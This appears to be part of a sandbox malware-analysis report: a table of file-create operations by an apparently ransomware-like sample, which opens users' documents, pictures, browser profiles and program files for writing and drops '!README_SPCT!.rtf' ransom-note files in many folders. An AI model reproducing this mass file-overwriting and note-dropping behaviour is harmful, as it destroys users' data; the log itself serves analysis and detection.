| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\mePpNahNCcQX\vsDhE4sOtdo.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\i2n6P.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\urTwF5-3dzsORJdKllA\FeqmDbbaR6w.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\Database1.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\j1nEtQ.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XYBOUcmDy70OY dJFx.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\qFYWwf\g9aj\jX0auxhEWsfyE.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\c02e_ZM3Y5br\SE8sS.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\qMRF3qfbPUUV.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\qFYWwf\bhOc-omJa3PNw.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\tnameserv.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\smgUvqd\h6poyx.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\GRAY.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BIO1un-Tbnc.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\sZCaoKy22\d8XRldYjtyAJ65cTL\CZHeADoWE59gR4Sui-\ViqPLc.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_it.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\JNnG1JO5YewtO\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\mePpNahNCcQX\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\1H l9 Sk6KE_oToG r\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\U4X3q\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mifLBovpFXNkBYjvc.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\sZCaoKy22\d8XRldYjtyAJ65cTL\Yu74qwIItsRFhrvtf.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\PZX9kMdC\OJgPT6VZ5GtSwYc.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\urTwF5-3dzsORJdKllA\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_fr.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\V26eVK1EEz0-Yv9 CPjG\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\V26eVK1EEz0-Yv9 CPjG\Yfo4Nm04yK g4eJDV\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\c02e_ZM3Y5br\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\qFYWwf\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\qFYWwf\g9aj\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\LINEAR_RGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ja.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\classlist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\currency.data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\accessibility.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\content-types.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_sv.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ko.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
